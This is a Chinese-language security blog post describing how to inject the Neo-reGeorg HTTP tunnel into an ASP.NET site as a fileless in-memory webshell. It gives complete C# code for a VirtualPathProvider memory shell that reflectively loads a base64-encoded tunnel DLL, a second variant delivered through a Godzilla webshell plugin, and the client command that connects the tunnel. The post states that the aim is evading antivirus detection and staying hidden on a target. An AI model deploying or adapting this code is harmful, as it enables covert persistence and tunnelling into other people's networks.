<!doctype html><html><!doctype html><html xmlns=http://www.w3.org/1999/xhtml xml:lang=en-us lang=en-us><head><meta charset=utf-8><meta name=generator content="Hugo 0.121.2"><meta name=viewport content="width=device-width,initial-scale=1"><title>内存攻防-内存版Neo-reGeorg代理 &#183; Wat4r Blog</title>
<meta name=description content><link rel=stylesheet href=/sass/water.min.css><link type=text/css rel=stylesheet href=https://wat4r.github.io/css/all.min.css><link type=text/css rel=stylesheet href=https://wat4r.github.io/css/dracula.css><link rel="shortcut icon" href=https://wat4r.github.io/images/favicon.ico></head><body><header><nav class=post-nav role=navigation><a href=/>‹ All Posts</a></nav></header><main class="container post-page"><article class=article><h1 class=post-title>内存攻防-内存版Neo-reGeorg代理</h1><aside class=toc><nav id=TableOfContents><ul><li><a href=#0x00-简介>0x00 简介</a></li><li><a href=#0x01-安装>0x01 安装</a></li><li><a href=#0x02-生成服务端>0x02 生成服务端</a></li><li><a href=#0x03-编译为dll>0x03 编译为dll</a></li><li><a href=#0x04-注入>0x04 注入</a><ul><li><a href=#内存马>内存马</a></li><li><a href=#方式一-使用aspx直接反射注入>方式一 使用aspx直接反射注入</a></li><li><a href=#方式二-通过godzilla插件注入>方式二 通过Godzilla插件注入</a></li></ul></li><li><a href=#0x05-连接>0x05 连接</a></li></ul></nav></aside><hr><h1 id=内存攻防-内存版neo-regeorg代理>内存攻防-内存版Neo-reGeorg代理</h1><h2 id=0x00-简介>0x00 简介</h2><p>​ <a href=https://github.com/L-codes/Neo-reGeorg>Neo-reGeorg</a> 是一个基于Python开发的HTTP正向隧道工具，它是对原始 <a href=https://github.com/sensepost/reGeorg>reGeorg</a> 工具的改进和重构，主要用于在受限的环境中建立一个从目标内网到攻击者控制服务器的隐蔽通道。</p><p>​ 本文主要介绍如何以内存马🐎的形式注入 Neo-reGeorg Server端到目标Web站点。内存版的 Neo-reGeorg 和内存马具有相同的优点，无需文件落地，可在一定程度上绕过杀毒软件的检测，增强隐蔽性。</p><p>​ 以下将以 <strong>ASP.NET</strong> 站点为例，介绍如何注入 <a href=https://github.com/L-codes/Neo-reGeorg>Neo-reGeorg</a> 内存马。以下测试环境为：Python 3.8 + Neo-reGeorg 5.2.0 + ASP.NET 4.0</p><h2 id=0x01-安装>0x01 安装</h2><p>​ Neo-reGeorg 服务端支持多种语言，本人在其基础上添加了C#版本的template <code>tunnel.cs</code>，现支持的服务端语言如下：</p><p><img src=https://s2.loli.net/2024/01/23/zleW34CdS6hNDpk.png alt=image-20240123075544296></p><p>下载 Neo-reGeorg</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>git clone https://github.com/L-codes/Neo-reGeorg.git
</span></span></code></pre></div><p>安装依赖</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>pip install requests
</span></span></code></pre></div><h2 id=0x02-生成服务端>0x02 生成服务端</h2><p>根据 templates 生成服务端，指定加密传输使用的的密码</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>python neoreg.py generate -k &lt;you_password&gt;
</span></span></code></pre></div><p><img src=https://s2.loli.net/2024/01/23/LUqabwkX2HZtPW3.png alt=image-20240123080633247></p><h2 id=0x03-编译为dll>0x03 编译为dll</h2><ol><li>使用IDE创建C# Class Library项目，并添加以下依赖<ul><li>System.Web</li></ul></li><li>把 Neo-reGeorg 生成的tunnel.cs 添加到项目中，效果如下</li><li>为了方便后续反射调用，把无参构造方法改个名字为 <strong>Run</strong></li></ol><p><img src=https://s2.loli.net/2024/01/25/KOwglP6p1IosuLT.png alt=image-20240125061933061></p><ol start=3><li>编译项目，生成 Neoreg.dll</li></ol><h2 id=0x04-注入>0x04 注入</h2><h3 id=内存马>内存马</h3><p>ASP.NET 实现内存马方式有许多种，包括filter内存马、Route内存马、HttpListener内存马、VirtualPath 内存马等，具体可以参考 <a href=https://tttang.com/user/yzddmr6>yzddmr6</a> 师傅的文章。以下将以 VirtualPath 内存马为例，介绍两种注入方式，但本质都是通过反射注入。</p><h3 id=方式一-使用aspx直接反射注入>方式一 使用aspx直接反射注入</h3><p>反射加载以上编译的dll</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c# data-lang=c#><span class=line><span class=cl><span class=n>String</span> <span class=n>neoregLibraryBase64</span> <span class=p>=</span> <span class=s>&#34;TVqQAAMAAAAEAAAA................&#34;</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=kt>byte</span><span class=p>[]</span> <span class=n>neoregLibrary</span> <span class=p>=</span> <span class=n>System</span><span class=p>.</span><span class=n>Convert</span><span class=p>.</span><span class=n>FromBase64String</span><span class=p>(</span><span class=n>neoregLibraryBase64</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=kt>object</span> <span class=n>neoreg</span> <span class=p>=</span> <span class=n>System</span><span class=p>.</span><span class=n>Reflection</span><span class=p>.</span><span class=n>Assembly</span><span class=p>.</span><span class=n>Load</span><span class=p>(</span><span class=n>neoregLibrary</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=n>neoregInstance</span> <span class=p>=</span> <span class=p>((</span><span class=n>System</span><span class=p>.</span><span class=n>Reflection</span><span class=p>.</span><span class=n>Assembly</span><span class=p>)</span><span class=n>neoreg</span><span class=p>).</span><span class=n>CreateInstance</span><span class=p>(</span><span class=s>&#34;Neoreg.Neoreg&#34;</span><span class=p>);</span>
</span></span></code></pre></div><p>我们可以把它保存到cache里，避免每一个请求都重复进行反射加载</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c# data-lang=c#><span class=line><span class=cl><span class=n>HttpContext</span><span class=p>.</span><span class=n>Current</span><span class=p>.</span><span class=n>Cache</span><span class=p>[</span><span class=s>&#34;neoreg&#34;</span><span class=p>]</span> <span class=p>=</span> <span class=n>neoregInstance</span><span class=p>;</span>
</span></span></code></pre></div><p>调用Run方法</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c# data-lang=c#><span class=line><span class=cl><span class=kt>var</span> <span class=n>runMethod</span> <span class=p>=</span> <span class=n>neoregInstance</span><span class=p>.</span><span class=n>GetType</span><span class=p>().</span><span class=n>GetMethod</span><span class=p>(</span><span class=s>&#34;Run&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=k>if</span> <span class=p>(</span><span class=n>runMethod</span> <span class=p>!=</span> <span class=kc>null</span><span class=p>)</span> <span class=n>runMethod</span><span class=p>.</span><span class=n>Invoke</span><span class=p>(</span><span class=n>neoregInstance</span><span class=p>,</span> <span class=kc>null</span><span class=p>);</span>
</span></span></code></pre></div><p>加上内存马部分，<code>neoreg.aspx</code> 完整实现如下：</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c# data-lang=c#><span class=line><span class=cl><span class=p>&lt;%</span><span class=err>@</span> <span class=n>Page</span> <span class=n>Language</span><span class=p>=</span><span class=s>&#34;C#&#34;</span><span class=p>%&gt;</span>
</span></span><span class=line><span class=cl><span class=p>&lt;%</span><span class=err>@</span> <span class=n>Import</span> <span class=n>Namespace</span><span class=p>=</span><span class=s>&#34;System.Web.Hosting&#34;</span> <span class=p>%&gt;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=p>&lt;</span><span class=n>script</span> <span class=n>runat</span><span class=p>=</span><span class=s>&#34;server&#34;</span><span class=p>&gt;</span>
</span></span><span class=line><span class=cl>    <span class=kd>public</span> <span class=k>class</span> <span class=nc>NeoregPathProvider</span> <span class=p>:</span> <span class=n>VirtualPathProvider</span>
</span></span><span class=line><span class=cl>    <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=kd>public</span> <span class=kd>override</span> <span class=kt>string</span> <span class=n>GetCacheKey</span><span class=p>(</span><span class=kt>string</span> <span class=n>virtualPath</span><span class=p>)</span>
</span></span><span class=line><span class=cl>        <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=n>String</span> <span class=n>neoregLibraryBase64</span> <span class=p>=</span>
</span></span><span class=line><span class=cl>                <span class=s>&#34;TVqQAAMAAAAEAAAA//8AAL.......................&#34;</span><span class=p>;</span>
</span></span><span class=line><span class=cl>            <span class=k>try</span>
</span></span><span class=line><span class=cl>            <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=n>HttpContext</span> <span class=n>context</span> <span class=p>=</span> <span class=n>HttpContext</span><span class=p>.</span><span class=n>Current</span><span class=p>;</span>
</span></span><span class=line><span class=cl>                <span class=n>String</span> <span class=n>type</span> <span class=p>=</span> <span class=n>context</span><span class=p>.</span><span class=n>Request</span><span class=p>.</span><span class=n>Params</span><span class=p>[</span><span class=s>&#34;proxy&#34;</span><span class=p>];</span>
</span></span><span class=line><span class=cl>                <span class=k>if</span> <span class=p>(</span><span class=n>type</span> <span class=p>==</span> <span class=s>&#34;neoreg&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                <span class=p>{</span>
</span></span><span class=line><span class=cl>                    <span class=n>Object</span> <span class=n>neoregInstance</span><span class=p>;</span>
</span></span><span class=line><span class=cl>                    <span class=kt>byte</span><span class=p>[]</span> <span class=n>neoregLibrary</span> <span class=p>=</span> <span class=n>Convert</span><span class=p>.</span><span class=n>FromBase64String</span><span class=p>(</span><span class=n>neoregLibraryBase64</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                    <span class=k>if</span> <span class=p>(</span><span class=n>context</span><span class=p>.</span><span class=n>Cache</span><span class=p>[</span><span class=s>&#34;neoreg&#34;</span><span class=p>]</span> <span class=p>==</span> <span class=kc>null</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>{</span>
</span></span><span class=line><span class=cl>                        <span class=kt>object</span> <span class=n>neoreg</span> <span class=p>=</span> <span class=n>System</span><span class=p>.</span><span class=n>Reflection</span><span class=p>.</span><span class=n>Assembly</span><span class=p>.</span><span class=n>Load</span><span class=p>(</span><span class=n>neoregLibrary</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                        <span class=n>neoregInstance</span> <span class=p>=</span> <span class=p>((</span><span class=n>System</span><span class=p>.</span><span class=n>Reflection</span><span class=p>.</span><span class=n>Assembly</span><span class=p>)</span><span class=n>neoreg</span><span class=p>).</span><span class=n>CreateInstance</span><span class=p>(</span><span class=s>&#34;Neoreg.Neoreg&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                        <span class=n>context</span><span class=p>.</span><span class=n>Cache</span><span class=p>[</span><span class=s>&#34;neoreg&#34;</span><span class=p>]</span> <span class=p>=</span> <span class=n>neoregInstance</span><span class=p>;</span>
</span></span><span class=line><span class=cl>                    <span class=p>}</span>
</span></span><span class=line><span class=cl>                    <span class=k>else</span>
</span></span><span class=line><span class=cl>                    <span class=p>{</span>
</span></span><span class=line><span class=cl>                        <span class=n>neoregInstance</span> <span class=p>=</span> <span class=n>context</span><span class=p>.</span><span class=n>Cache</span><span class=p>[</span><span class=s>&#34;neoreg&#34;</span><span class=p>];</span>
</span></span><span class=line><span class=cl>                    <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>                    <span class=k>if</span> <span class=p>(</span><span class=n>neoregInstance</span> <span class=p>!=</span> <span class=kc>null</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>{</span>
</span></span><span class=line><span class=cl>                        <span class=kt>var</span> <span class=n>runMethod</span> <span class=p>=</span> <span class=n>neoregInstance</span><span class=p>.</span><span class=n>GetType</span><span class=p>().</span><span class=n>GetMethod</span><span class=p>(</span><span class=s>&#34;Run&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                        <span class=k>if</span> <span class=p>(</span><span class=n>runMethod</span> <span class=p>!=</span> <span class=kc>null</span><span class=p>)</span> <span class=n>runMethod</span><span class=p>.</span><span class=n>Invoke</span><span class=p>(</span><span class=n>neoregInstance</span><span class=p>,</span> <span class=kc>null</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                    <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>                    <span class=n>context</span><span class=p>.</span><span class=n>Response</span><span class=p>.</span><span class=n>End</span><span class=p>();</span>
</span></span><span class=line><span class=cl>                <span class=p>}</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>            <span class=k>catch</span> <span class=p>(</span><span class=n>Exception</span> <span class=n>e</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=n>Console</span><span class=p>.</span><span class=n>WriteLine</span><span class=p>(</span><span class=n>e</span><span class=p>.</span><span class=n>Message</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=n>Previous</span><span class=p>.</span><span class=n>GetCacheKey</span><span class=p>(</span><span class=n>virtualPath</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl><span class=p>&lt;/</span><span class=n>script</span><span class=p>&gt;</span>
</span></span><span class=line><span class=cl><span class=p>&lt;%</span>
</span></span><span class=line><span class=cl>    <span class=kt>string</span> <span class=n>msg</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=k>try</span>
</span></span><span class=line><span class=cl>    <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=n>NeoregPathProvider</span> <span class=n>neoregProvider</span> <span class=p>=</span> <span class=k>new</span> <span class=n>NeoregPathProvider</span><span class=p>();</span>
</span></span><span class=line><span class=cl>        <span class=n>HostingEnvironment</span><span class=p>.</span><span class=n>RegisterVirtualPathProvider</span><span class=p>(</span><span class=n>neoregProvider</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=n>neoregProvider</span><span class=p>.</span><span class=n>InitializeLifetimeService</span><span class=p>();</span>
</span></span><span class=line><span class=cl>        <span class=n>msg</span> <span class=p>=</span> <span class=s>&#34;Inject success!&#34;</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=k>catch</span> <span class=p>(</span><span class=n>Exception</span> <span class=n>error</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=n>msg</span> <span class=p>=</span> <span class=s>&#34;Inject error: &#34;</span> <span class=p>+</span> <span class=n>error</span><span class=p>.</span><span class=n>Message</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=n>Context</span><span class=p>.</span><span class=n>Response</span><span class=p>.</span><span class=n>Write</span><span class=p>(</span><span class=n>msg</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=n>Context</span><span class=p>.</span><span class=n>Response</span><span class=p>.</span><span class=n>End</span><span class=p>();</span>
</span></span><span class=line><span class=cl><span class=p>%&gt;</span>
</span></span></code></pre></div><p>访问 <code>neoreg.aspx</code> 进行注入</p><p><img src=https://s2.loli.net/2024/01/25/xpVyZAX8sDLR6bg.png alt=image-20240125064222689></p><h3 id=方式二-通过godzilla插件注入>方式二 通过Godzilla插件注入</h3><p>​ 借助 Godzilla 的C#程序集加载插件 <a href=https://github.com/wat4r/GodzillaAssemblyLoadPlugin>GodzillaAssemblyLoadPlugin</a>，可以通过Godzilla的aspx Webshell直接从内存执行注入操作，无文件落地，具体实现过程如下：</p><ol><li><p>使用 IDE 再新建一个 C# Class Library项目，并添加 System.Web 依赖</p></li><li><p>具体实现代码和<a href=#aaa8>方式一</a>差不多，将其编译为dll，完整代码如下：</p></li></ol><div class=highlight><pre tabindex=0 class=chroma><code class=language-c# data-lang=c#><span class=line><span class=cl><span class=k>using</span> <span class=nn>System</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=k>using</span> <span class=nn>System.Web</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=k>using</span> <span class=nn>System.Web.Hosting</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>namespace</span> <span class=nn>GodzillaNeoreg</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=kd>public</span> <span class=k>class</span> <span class=nc>NeoregPathProvider</span> <span class=p>:</span> <span class=n>VirtualPathProvider</span>
</span></span><span class=line><span class=cl>    <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=kd>public</span> <span class=kd>override</span> <span class=kt>string</span> <span class=n>GetCacheKey</span><span class=p>(</span><span class=kt>string</span> <span class=n>virtualPath</span><span class=p>)</span>
</span></span><span class=line><span class=cl>        <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=n>String</span> <span class=n>neoregLibraryBase64</span> <span class=p>=</span> <span class=s>&#34;TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAA.....&#34;</span><span class=p>;</span>
</span></span><span class=line><span class=cl>            <span class=k>try</span>
</span></span><span class=line><span class=cl>            <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=n>HttpContext</span> <span class=n>context</span> <span class=p>=</span> <span class=n>HttpContext</span><span class=p>.</span><span class=n>Current</span><span class=p>;</span>
</span></span><span class=line><span class=cl>                <span class=n>String</span> <span class=n>type</span> <span class=p>=</span> <span class=n>context</span><span class=p>.</span><span class=n>Request</span><span class=p>.</span><span class=n>Params</span><span class=p>[</span><span class=s>&#34;proxy&#34;</span><span class=p>];</span>
</span></span><span class=line><span class=cl>                <span class=k>if</span> <span class=p>(</span><span class=n>type</span> <span class=p>==</span> <span class=s>&#34;neoreg&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                <span class=p>{</span>
</span></span><span class=line><span class=cl>                    <span class=n>Object</span> <span class=n>neoregInstance</span><span class=p>;</span>
</span></span><span class=line><span class=cl>                    <span class=kt>byte</span><span class=p>[]</span> <span class=n>neoregLibrary</span> <span class=p>=</span> <span class=n>Convert</span><span class=p>.</span><span class=n>FromBase64String</span><span class=p>(</span><span class=n>neoregLibraryBase64</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                    <span class=k>if</span> <span class=p>(</span><span class=n>context</span><span class=p>.</span><span class=n>Cache</span><span class=p>[</span><span class=s>&#34;neoreg&#34;</span><span class=p>]</span> <span class=p>==</span> <span class=kc>null</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>{</span>
</span></span><span class=line><span class=cl>                        <span class=kt>object</span> <span class=n>neoreg</span> <span class=p>=</span> <span class=n>System</span><span class=p>.</span><span class=n>Reflection</span><span class=p>.</span><span class=n>Assembly</span><span class=p>.</span><span class=n>Load</span><span class=p>(</span><span class=n>neoregLibrary</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                        <span class=n>neoregInstance</span> <span class=p>=</span> <span class=p>((</span><span class=n>System</span><span class=p>.</span><span class=n>Reflection</span><span class=p>.</span><span class=n>Assembly</span><span class=p>)</span><span class=n>neoreg</span><span class=p>).</span><span class=n>CreateInstance</span><span class=p>(</span><span class=s>&#34;Neoreg.Neoreg&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                        <span class=n>context</span><span class=p>.</span><span class=n>Cache</span><span class=p>[</span><span class=s>&#34;neoreg&#34;</span><span class=p>]</span> <span class=p>=</span> <span class=n>neoregInstance</span><span class=p>;</span>
</span></span><span class=line><span class=cl>                    <span class=p>}</span>
</span></span><span class=line><span class=cl>                    <span class=k>else</span>
</span></span><span class=line><span class=cl>                    <span class=p>{</span>
</span></span><span class=line><span class=cl>                        <span class=n>neoregInstance</span> <span class=p>=</span> <span class=n>context</span><span class=p>.</span><span class=n>Cache</span><span class=p>[</span><span class=s>&#34;neoreg&#34;</span><span class=p>];</span>
</span></span><span class=line><span class=cl>                    <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>                    <span class=k>if</span> <span class=p>(</span><span class=n>neoregInstance</span> <span class=p>!=</span> <span class=kc>null</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>{</span>
</span></span><span class=line><span class=cl>                        <span class=kt>var</span> <span class=n>runMethod</span> <span class=p>=</span> <span class=n>neoregInstance</span><span class=p>.</span><span class=n>GetType</span><span class=p>().</span><span class=n>GetMethod</span><span class=p>(</span><span class=s>&#34;Run&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                        <span class=k>if</span> <span class=p>(</span><span class=n>runMethod</span> <span class=p>!=</span> <span class=kc>null</span><span class=p>)</span> <span class=n>runMethod</span><span class=p>.</span><span class=n>Invoke</span><span class=p>(</span><span class=n>neoregInstance</span><span class=p>,</span> <span class=kc>null</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                    <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>                    <span class=n>context</span><span class=p>.</span><span class=n>Response</span><span class=p>.</span><span class=n>End</span><span class=p>();</span>
</span></span><span class=line><span class=cl>                <span class=p>}</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>            <span class=k>catch</span> <span class=p>(</span><span class=n>Exception</span> <span class=n>e</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=n>Console</span><span class=p>.</span><span class=n>WriteLine</span><span class=p>(</span><span class=n>e</span><span class=p>.</span><span class=n>Message</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=n>Previous</span><span class=p>.</span><span class=n>GetCacheKey</span><span class=p>(</span><span class=n>virtualPath</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=kd>public</span> <span class=k>class</span> <span class=nc>NeoregInject</span>
</span></span><span class=line><span class=cl>    <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=kd>public</span> <span class=n>NeoregInject</span><span class=p>()</span>
</span></span><span class=line><span class=cl>        <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=kt>string</span> <span class=n>msg</span><span class=p>;</span>
</span></span><span class=line><span class=cl>            <span class=k>try</span>
</span></span><span class=line><span class=cl>            <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=n>NeoregPathProvider</span> <span class=n>neoregProvider</span> <span class=p>=</span> <span class=k>new</span> <span class=n>NeoregPathProvider</span><span class=p>();</span>
</span></span><span class=line><span class=cl>                <span class=n>HostingEnvironment</span><span class=p>.</span><span class=n>RegisterVirtualPathProvider</span><span class=p>(</span><span class=n>neoregProvider</span><span class=p>);</span>
</span></span><span class=line><span class=cl>                <span class=n>neoregProvider</span><span class=p>.</span><span class=n>InitializeLifetimeService</span><span class=p>();</span>
</span></span><span class=line><span class=cl>                <span class=n>msg</span> <span class=p>=</span> <span class=s>&#34;Inject success!&#34;</span><span class=p>;</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>            <span class=k>catch</span> <span class=p>(</span><span class=n>Exception</span> <span class=n>error</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=n>msg</span> <span class=p>=</span> <span class=s>&#34;Inject error: &#34;</span> <span class=p>+</span> <span class=n>error</span><span class=p>.</span><span class=n>Message</span><span class=p>;</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=n>HttpContext</span><span class=p>.</span><span class=n>Current</span><span class=p>.</span><span class=n>Response</span><span class=p>.</span><span class=n>Write</span><span class=p>(</span><span class=n>msg</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=n>HttpContext</span><span class=p>.</span><span class=n>Current</span><span class=p>.</span><span class=n>Response</span><span class=p>.</span><span class=n>End</span><span class=p>();</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span></code></pre></div><ol start=3><li><p>在 Godzilla 安装 <a href=https://github.com/wat4r/GodzillaAssemblyLoadPlugin>GodzillaAssemblyLoadPlugin</a> 插件并连上目标aspx webshell</p></li><li><p>在GodzillaAssemblyLoadPlugin中选择编译好的dll，输入dll里对应的instance：<code>GodzillaNeoreg.NeoregInject</code>，然后点击Run</p></li></ol><p><img src=https://s2.loli.net/2024/01/25/xw8YbqFL24Z9DSV.png alt=image-20240125082045391></p><h2 id=0x05-连接>0x05 连接</h2><p>使用客户端连接</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>python neoreg.py -u http://localhost:5000/?proxy<span class=o>=</span>neoreg -k P@ssw0rd -vv
</span></span></code></pre></div><p><img src=https://s2.loli.net/2024/01/25/1d7k4lObgtvaXCc.png alt=image-20240125082648486></p><p>连接成功！🔚</p></article></main><footer><p>© 2024 Wat4r's Blog</p></footer><script src=https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.11/clipboard.min.js></script><script src=https://wat4r.github.io/js/code_header.js></script></body></html>